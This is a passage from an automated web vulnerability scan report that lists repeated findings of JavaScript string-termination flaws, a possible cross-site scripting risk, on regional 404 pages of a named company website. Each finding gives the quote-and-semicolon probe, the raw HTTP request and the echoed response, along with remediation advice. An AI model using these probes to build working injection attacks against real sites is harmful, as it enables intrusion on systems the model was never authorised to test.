Connection: close
Expires: Mon, 16 Nov 2009 18:57:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/de/solutions/var9c3cf';04d6695c844/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.499. http://www.verizonbusiness.com/dk/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /dk/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c683a'%3be6c794c75b1 was submitted in the REST URL parameter 1. This input was echoed as c683a';e6c794c75b1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dkc683a'%3be6c794c75b1/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:56:08 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40613
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:56:08 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:56:08 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/dkc683a';e6c794c75b1/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.500. http://www.verizonbusiness.com/dk/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /dk/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f9e0"%3ba89f9bbbb8d was submitted in the REST URL parameter 1. This input was echoed as 8f9e0";a89f9bbbb8d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dk8f9e0"%3ba89f9bbbb8d/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:55:56 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40613
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:55:56 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:55:56 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/dk8f9e0";a89f9bbbb8d/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.501. http://www.verizonbusiness.com/es/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /es/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 911eb'%3b3df332fadc4 was submitted in the REST URL parameter 1. This input was echoed as 911eb';3df332fadc4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /es911eb'%3b3df332fadc4/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:00:43 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47571
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:00:43 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:00:43 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/es911eb';3df332fadc4/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.502. http://www.verizonbusiness.com/es/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /es/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce697"%3b399d83492f5 was submitted in the REST URL parameter 1. This input was echoed as ce697";399d83492f5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /esce697"%3b399d83492f5/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:00:17 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47571
Date: Wed, 17 Nov 2010 01:00:18 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:00:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Esta p..gina no existe";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/esce697";399d83492f5/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.503. http://www.verizonbusiness.com/fi/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /fi/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2091"%3bb5b04219c4d was submitted in the REST URL parameter 1. This input was echoed as b2091";b5b04219c4d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fib2091"%3bb5b04219c4d/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:55:49 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40615
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:55:49 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:55:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/fib2091";b5b04219c4d/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.504. http://www.verizonbusiness.com/fi/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /fi/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4de9e'%3b16f6b19da21 was submitted in the REST URL parameter 1. This input was echoed as 4de9e';16f6b19da21 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fi4de9e'%3b16f6b19da21/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:55:58 GMT
Content-Type: text/html
Content-Length: 40615
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:55:59 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:55:58 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/fi4de9e';16f6b19da21/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.505. http://www.verizonbusiness.com/fr/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /fr/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe08a"%3b6431fabea57 was submitted in the REST URL parameter 1. This input was echoed as fe08a";6431fabea57 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /frfe08a"%3b6431fabea57/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:56:47 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 47903
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:56:47 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:56:47 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...

}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page introuvable";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/frfe08a";6431fabea57/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.506. http://www.verizonbusiness.com/fr/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /fr/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ee1f'%3bd217fa1bbdd was submitted in the REST URL parameter 1. This input was echoed as 9ee1f';d217fa1bbdd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fr9ee1f'%3bd217fa1bbdd/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:56:58 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 47903
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:56:58 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:56:58 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/fr9ee1f';d217fa1bbdd/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.507. http://www.verizonbusiness.com/hk/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /hk/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21929"%3be60a51b6d1f was submitted in the REST URL parameter 1. This input was echoed as 21929";e60a51b6d1f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hk21929"%3be60a51b6d1f/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:56:23 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40613
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:56:24 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:56:23 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/hk21929";e60a51b6d1f/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.508. http://www.verizonbusiness.com/hk/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /hk/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 636c6'%3bfffcec4af48 was submitted in the REST URL parameter 1. This input was echoed as 636c6';fffcec4af48 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hk636c6'%3bfffcec4af48/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:56:31 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40613
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:56:31 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:56:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/hk636c6';fffcec4af48/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.509. http://www.verizonbusiness.com/ie/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /ie/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb07b'%3b0ca71a312dd was submitted in the REST URL parameter 1. This input was echoed as eb07b';0ca71a312dd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ieeb07b'%3b0ca71a312dd/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:56:56 GMT
Content-Type: text/html
Content-Length: 40613
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:56:56 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:56:56 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/ieeb07b';0ca71a312dd/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.510. http://www.verizonbusiness.com/ie/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /ie/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cea8d"%3b062b4b2aa2e was submitted in the REST URL parameter 1. This input was echoed as cea8d";062b4b2aa2e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /iecea8d"%3b062b4b2aa2e/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:56:45 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40613
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:56:46 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:56:45 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/iecea8d";062b4b2aa2e/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.511. http://www.verizonbusiness.com/in/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /in/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a62fb"%3b248d3b66c9b was submitted in the REST URL parameter 1. This input was echoed as a62fb";248d3b66c9b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ina62fb"%3b248d3b66c9b/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:56:54 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40604
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:56:54 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:56:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/ina62fb";248d3b66c9b/index.xml";

